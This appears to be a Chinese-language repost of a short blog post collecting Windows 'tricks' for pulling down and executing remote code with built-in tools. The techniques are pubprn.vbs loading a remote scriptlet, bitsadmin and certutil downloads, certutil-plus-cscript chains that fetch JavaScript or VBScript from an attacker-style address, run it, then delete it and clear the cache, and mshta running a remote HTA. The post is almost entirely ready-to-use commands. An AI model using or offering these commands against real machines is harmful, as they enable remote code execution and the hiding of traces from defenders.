Some Tricks

远程执行sct的另一种姿势

cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct

detail:https://posts.specterops.io/wsh-injection-a-case-study-fd35f79d29dd


命令行下载姿势1


bitsadmin /rawreturn /transfer getfile http://download.sysinternals.com/files/PSTools.zip c:\p.zip
bitsadmin /rawreturn /transfer getpayload http://download.sysinternals.com/files/PSTools.zip c:\p.zip
bitsadmin /transfer myDownLoadJob /download /priority normal "http://download.sysinternals.com/files/PSTools.zip" "c:\p.zip"


命令行下载姿势2

certutil -urlcache -split -f http://192.168.254.102:80/a.txt b.txt

清除缓存 certutil -urlcache -split -f http://192.168.254.102:80/a.txt delete


命令行执行远程JS


certutil -urlcache -split -f http://192.168.254.102:80/a a.js && cscript a.js &&  del a.js && certutil -urlcache -split -f http://192.168.254.102:80/a delete

命令行远程执行VBS


certutil -urlcache -split -f http://192.168.254.102:80/abc a.vbs &&
 cscript a.vbs &&  del a.vbs && certutil -urlcache -split -f
  http://192.168.254.102:80/abc delete

命令行远程执行HTA


mshta http://192.168.254.102/1.hta


文章出处:Evi1cg's blog   

原文链接:https://evi1cg.me/archives/Tricks.html

本文由 华盟网 作者:congtou 发表,其版权均为 华盟网 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。

1

相关文章

发表评论

电子邮件地址不会被公开。